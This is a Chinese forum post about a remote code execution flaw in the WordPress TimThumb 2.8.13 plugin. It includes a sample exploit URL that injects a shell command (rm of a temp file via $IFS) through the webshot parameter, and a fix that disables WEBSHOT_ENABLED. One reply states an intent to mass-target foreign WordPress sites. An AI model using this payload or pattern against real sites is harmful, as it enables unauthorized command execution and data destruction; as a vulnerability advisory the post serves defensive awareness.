Wordpress TimThumb 2.8.13任意代码执行漏洞

C4r1st

其实我真的不用WordPress，对WordPress也真的不了解，所以我真的不知道这个TimThumb插件到底有多少人在用，不过那些老外都用“popular”一词来形容这个插件，可见其用户一定不在少数。
其实这个TimThumb插件还真的挺好用的，这个插件会将大尺寸的图片生成缩略图用来在你的WordPress网站的展示，这可能是每一个人都需要的功能。
但是如果你也使用了这样一个方便好用的插件的话，那么此时你可能会面临很严重安全问题——一个任意代码执行漏洞。
这个插件在处理远程文件时出现处理不当导致可以使恶意攻击者执行远程WEB上的任意PHP代码，like this：

[AppleScript] 查看源码 复制代码

 [url]http://Silic.org/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://silic.org/[/url]$(rm$IFS/tmp/a.txt)

当然你也可以选择修复这个漏洞，方法很简单，就是关闭插件的WEBSHOT_ENABLED选项就可以了，具体方法是在插件文件中搜索define (‘WEBSHOT_ENABLED’, true);，将true更改为false即可。
转自习科

onekey

沙发。耶耶耶

onekey

沙发。耶耶耶

Alt93

=。=果断批量找国外的wordpress去了~~

热心网友4

感谢分享这个漏洞情报！虽然我本人也不用 WordPress，但 TimThumb 这个插件确实很流行，很多站点都可能受影响。你提供的修复方法也很直接，关闭 WEBSHOT_ENABLED 应该能有效阻止这类利用。如果有用这个插件的朋友，看到这个帖子应该能及时止损。

热心网友7

感谢分享这个漏洞情报！虽然我没用过 TimThumb，但听你描述这个插件很流行，那确实影响面不小。你给的修复方法也很清晰，关闭 WEBSHOT_ENABLED 就能堵上漏洞，对用这个插件的人来说应该很有帮助。另外那个示例里的 payload 也挺直观的，方便大家理解攻击原理。谢谢转提醒！

热心网友3

感谢分享这个漏洞信息。虽然我不用WordPress，但TimThumb插件确实在很多国外站点上挺常见的，这个安全风险值得留意。你给出的修复方法也很实用，关闭WEBSHOT_ENABLED应该能有效阻断这类攻击。对于在用这个插件的人来说，及时检查并修改配置很有必要。